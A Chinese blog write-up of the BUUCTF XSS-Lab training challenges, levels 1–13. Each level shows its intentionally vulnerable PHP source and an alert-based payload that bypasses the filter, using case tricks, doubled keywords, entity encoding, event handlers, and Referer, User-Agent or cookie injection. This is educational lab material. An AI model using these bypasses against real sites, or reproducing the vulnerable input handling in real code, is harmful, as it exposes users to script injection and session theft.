BUUCTF刷题 XSS-Lab

最新推荐文章于 2024-09-30 17:57:03 发布
最新推荐文章于 2024-09-30 17:57:03 发布
阅读量1.3k 收藏 9
点赞数 5
分类专栏: BUUCTF 渗透测试 文章标签: xss 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54438700/article/details/131723012
版权
本文详细介绍了XSS跨站脚本攻击的多个层次,包括直接注入、闭合双引号、onclick事件、JavaScript伪协议、大小写绕过、双写标签过滤、ASCII编码绕过、必要字段+ASCII绕过、hidden参数传递和HTTP头部注入等场景,展示了攻击者如何构造Payload来绕过防御机制,同时也反映了网络安全中对XSS防护的重要性。
摘要由CSDN通过智能技术生成

level 1(直接注入)

观察URL,在参数name处上传JS代码进行测试,GET传参,出现弹窗。

Payload:<script>alert('xss')</script>

 level 2(闭合双引号注入)

直接插入level 1中的JS代码<script>alert("XSS")</script>,并没有出现弹窗,通过右键查看网页源代码,发现我们输入的JS代码在双引号内,因此需要通过闭合双引号进行绕过。

Payload:"><script>alert('xss')</script><"

 level 3 (onclick单引号绕过)

直接插入level 1的JS代码<script>alert("XSS")</script>,没有出现弹窗,通过查看网页源代码,发现我们插入的JS代码依旧被转义了,可以通过onclick函数可以绕过,可以理解为:不再生成JS代码,而是直接变成一个点击事件,这里还要注意要用单引号进行闭合。Payload:' onclick ='javascript:alert(1)'//,点击搜索框跳出弹窗。

 level 4(onclick双引号绕过)

level 3相似,都是输入的JS代码被转义,也可以通过onclick函数进行绕过,只不过这一关是双引号闭合,Payload:" onclick ='javascript:alert("XSS")'//,点击搜索框跳出弹窗。

level 5(JavaScript伪协议)

1、直接插入level 1中的JS代码<script>alert("XSS")</script>,未出现弹窗,右键查看源代码,发现将原本的<script>变成了<scr_ipt>

2、插入level 4中的payload" onclick ='javascript:alert("XSS")'//,也是未出现弹窗,右键查看源代码,发现原本的onclick变成了o_nclick

3、考虑可以构造一个Payload闭合原有标签,重新创建一个新的标签a,在标签a引用script 超链接调用弹窗。Payload:"><a href="javascript:alert("XSS")">link</a>,最后点击一下link,就会跳出弹窗。

 level 6(JavaScript伪协议+大小写绕过)

这一关主要是利用了HTML对大小写不敏感进行绕过。

1、直接插入level 1中的JS代码<script>alert("XSS")</script>,未出现弹窗,右键查看源代码, 发现将原本的<script>变成了<scr_ipt>,这里与level 5有些相似。

2、我们插入level 5中植入的代码"><a href="javascript:alert("XSS")">link</a>,发现并未出现弹窗,再次右键查看源代码,发现href变成了hr_ef,这里我们考虑大小写绕过,

Payload:"><a Href="javascript:alert(1),最后随意点击一处空白就可以出现弹窗。

其他方式:

我这里也试了一下,双引号闭合+大小写绕过,也是会出现弹窗的,答案不唯一,payload:"><scRipt>alert("XSS")</script>

 level 7(双写绕过标签过滤)

1、植入level 1中的JS代码<script>alert("XSS")></script>,未出现弹窗,右键查看源代码,发现script被过滤了

2、通过查看文件的源码,发现通过代码层对我们输入的内容进行了一套循环过滤。

文件源代码:
<?php 
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]); //strtolower函数将获取到的参数全部转化为小写
$str2=str_replace("script","",$str); //过滤了script
$str3=str_replace("on","",$str2); //过滤了on
$str4=str_replace("src","",$str3); //过滤了src
$str5=str_replace("data","",$str4); //过滤了data
$str6=str_replace("href","",$str5); //过滤了href
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

3、考虑双写+闭合双引号进行绕过,Payload:"><scscriptript>alert("XSS")</scscriptript>,随意点击空白处出现弹窗。

 level 8(ASCII编码绕过)

1、插入level 7中的JS代码"><scscriptript>alert("XSS")</scscriptript>,未出现弹窗,右键查看源代码,发现做了转义符替换和过滤处理。

2、查看文件源代码。

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">  
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';  //这里可以利用
?>
<center><img src=level8.jpg></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>

3、考虑可以使用html实体编码绕过

 HTML字符实体转换网站

将字符javascript:alert(1)转化为实体。

  payload:&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

level 9 (必要字段+ASCII绕过)

1、将level 8中的代码javascript:alert(1)写入后,未出现弹窗,右键查看源代码,发现提示连接不合法。

2、查看源代码。

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>

这里补充一下strpos()函数

strpos() f函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。

返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。

这里多了一行代码 if(false===strpos($str7,'http://')),这里是检测传入的字符有没有http://,如果没有这个字符就会返回“您的连接不合法?有没有!“,所以我们将alert中加上这个字符就可以绕过了。payload:&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;('http://')

level 10 (hidden参数传递数据)

1、插入level 1中的代码<script>alert("XSS")</script>,未出现弹窗,右键查看源代码,发现<和>被转义

2、查看文件源代码 ,代码中对t_sort参数进行了两次过滤,考虑这里为注入点。

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里补充一下Hidden :

Hidden 对象代表一个 HTML 表单中的某个隐藏输入域。

这种类型的输入元素实际上是隐藏的。这个不可见的表单元素的 value 属性保存了一个要提交给 Web 服务器的任意字符串。如果想要提交并非用户直接输入的数据的话,就是用这种类型的元素。

onmouseover 事件:

onmouseover 事件会在鼠标指针移动到指定的元素上时发生。

这里提供两种注入方式

一、绑定onmouseover 事件,需要注意的是,代码中的type="hidden",这个属性会隐藏表单,这样我们就找不到要点击的地方了,这里需要我们手动添加type,paylosd:t_sort=" onmouseover='alert("XSS")' type="text,这里需要鼠标移过去来触发弹窗。

二、绑定onclick事件,与前面不同的是,这里需要点击鼠标才会触发弹窗。payload:t_sort=" onclick='alert("XSS")' type="text

 level 11 (REFERER头注入)

1、插入level 1中的代码<script>alert("XSS")</script>,未出现弹窗,右键查看源代码,发现<和>被转义

 2、查看文件源代码。

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

通过代码,可以看到t_sort被htmlspecialchars函数转义了。$str33只是过滤了><,可以将这里作为注入点,只需要携带一个注入的语句访问网站就可以了。Payload:"onclick='alert("XSS")' type="text

level 12(USER_AGENT注入)

1、右键查看源代码。

2、查看文件源代码。

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_USER_AGENT'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ua"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

与level 11相似,这里注入点是USER_AGENT,Payload:" onclick='alert(1)' type="text

level 13 (COOKIE注入)

 1、右键查看源代码,猜测是cookie注入。

2、Payload:user=" onclick='alert(1)' type="text

小谷要努力~
关注
专栏目录
xss-labs 1-15
m0_65977612的博客
11-11 685
BUU XSS-Lab 1-15
XSS-lab通关记录
zjnu_y3s的博客
04-11 2275
本文章为buuctf basic XSS-lab的通关记录,为个人学习记录,仅供参考 在学习xss-lab之前,先了解了一下xss攻击的原理,如下: 简述 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSS。 跨站脚本攻击(XSS),是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中,当正常用户访问该页面时,则.
BuuctfXSS-Lab
2202_75354817的博客
08-05 742
这关卡越往后越离谱,前十几关用来练练绕过技巧还是不错的。而且有些关卡的组件不能用了,影响做题。
CTF自学-XSS(1)
最新发布
m0_61926696的博客
09-30 824
XSS(Cross Site Scripting,防止与CSS混淆)跨站脚本攻击,即向web页面插入恶意脚本代码,与SQL注入相似,不过SQL注入的位置是数据库查询语句,XSS注入的是网页脚本。
BUUCTF XSS闯关1
m0_74167420的博客
04-18 2205
使用'1闭合后面的单引号,当然也可以使用"//"将其注释,最终 username = alert(1);这段代码是一个简单的JavaScript脚本,其中包含一个alert函数调用,用于显示一个弹出框,内容为"xss"。javascript:alert(1),浏览器会把javascript后面的内容当做代码执行,直接在当前页面执行。所以执行:autosubmit=1&action=JavaScript:alert(1);
BuuCTF[第二章 web进阶]XSS闯关
m_de_g的博客
07-27 5795
** [第二章 web进阶]XSS闯关 ** 一、解题思路 1.一来看了一下题目的说明 我们需要执行alert函数 那就开启闯关模式,第一关,一看这个URL就很奇怪没直接上手,二话没说成功下一关 http://491c2e5e-9e61-408a-b82d-6615548d150b.node4.buuoj.cn/level1?username=<script>alert('xss')</script> 通过观察url,我惊奇的发现闯关的关卡,是由level1,level2…,我
BUUCTF[第二章 web进阶]XSS闯关
2301_78136321的博客
09-26 729
alert(1)</script>进行常规XSS注入。首先使用<script>alert(1)
XSS-LabXSS注入笔记1-16)
小谢的博客
10-29 5134
XSS-LabXSS注入笔记1-16)
xss-lab全通关教程
05-07
XSS-lab的20个关卡中,你将依次接触这些类型,并学习如何构造有效的XSS payload,以及如何利用各种过滤和转义机制来绕过防护。例如,你可能会遇到如何在URL参数、表单提交或者cookies中隐藏和传递XSS payload的...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9357
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
BUUCTF[第二章Web进阶]XSS闯关教程
DMXA的博客
11-01 764
攻击方式:这种攻击多见于论坛、博客和留言板,攻击者在发帖的过程中,将恶意代码连同正常信息一起注入帖子的内容中。当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段带有XSS代码的恶意脚本后,就会触发XSS漏洞。存储型XSS又称为持久型XSS,攻击脚本将被永久的放在目标服务器的数据库或文件中,具有很高的隐蔽性。DOM型XSS其实是一种特殊的反射型XSS,它基于DOM文档对象模型的一种漏洞。(3)DOM型XSS
BUUCTF [第二章 web进阶]XSS闯关
m0_49025459的博客
04-12 1983
题目 第一关 这一关没有过滤直接修改url就行 ?username=<script>alert('xss')</script> 第二关 这一题样式没什么变化直接上源码 <html lang="zh"><head> <meta charset="UTF-8"> <title>XSS配套测试平台</title> <meta http-equiv="Content-Type"
BUUCTF-CISCN-华东北赛区Web-XSS
迷风小白
09-11 4602
XSS 拿到题目出现如下界面 随便点击测试一下,发现需要注册登录,随即注册一个用户登录(admin用户不能注册) 发现有投稿和反馈这两个页面可以操作 结合标题再看看这两个页面,投稿页面是用来放XSS的,然后在反馈给管理员这样我们就能拿到管理员的cookie,因为这里是内网环境,所以只能去 http://xss.buuoj.cn 注册账号来接收cookie。 经过测试发现提交的内容部分会被转义...
自建XSS平台与BUUCTF[GWCTF 2019]mypassword
qq_41755084的博客
08-09 441
从这里创建网站,将xss平台文件拷贝到phpstudy平台安装目录的www目录下,然后在根目录里设定为xss平台文件所在的目录。这里就需要后台机器人先在两个输入框里输入账号密码,然后把这两个值存入cookie,然后读取其中的一个值,这个利用条件我感觉有点苛刻,但是不管,先试试再说。接下来需要将本地的xss平台服务映射到有公网ip的服务器上,这样靶机访问公网ip的服务器时就相当于访问本地的xss平台,完成攻击目的。启动后,访问目标服务器的7500端口,输入展示板的账号密码,应该就可以看到frp服务的展板了。
xss-labs详解(上)1-10
hxhxhxhxx的博客
08-02 1185
xss-labs详解Level 1Level 2htmlspecialcharsLevel 3Level 4Level 5Level 6Level 7Level 8Level 9LevelLevelLevelLevel Level 1 源码 <!DOCTYPE html><!--STATUS OK--><html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-
XSS学习 xss-Lab题解
qq_61768489的博客
02-12 2515
level 1 没有任何防护,直接url传xss name=<script>alert(1)</script> level2 有个input标签,尝试用"> 闭合标签 (在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签) "><script>alert(1)</script> level 3 测试发现尖括号被转换字...
【CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 2918
有两个尝试点。
XSS-Lab第十关
07-27
XSS-Lab的第十关是一个注入漏洞的挑战。根据引用\[2\],XSS-Lab是一个用于学习XSS注入的平台,每一关都有不同的XSS注入漏洞。在第十关中,与上一关不同的是会加入地址的检查。具体来说,该关会检查输入的数据中是否包含"http://"字段。因此,为了通过这一关,我们需要在输入的字段中加入该字段,例如输入"java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://')"。这样,当受害者访问该页面时,恶意代码会在其浏览器上执行,从而成功通过第十关。 #### 引用[.reference_title] - *1* *2* *3* [XSS攻击-xss-lab(1-10)详细讲解](https://blog.csdn.net/qq_43395215/article/details/105955004)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小谷要努力~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值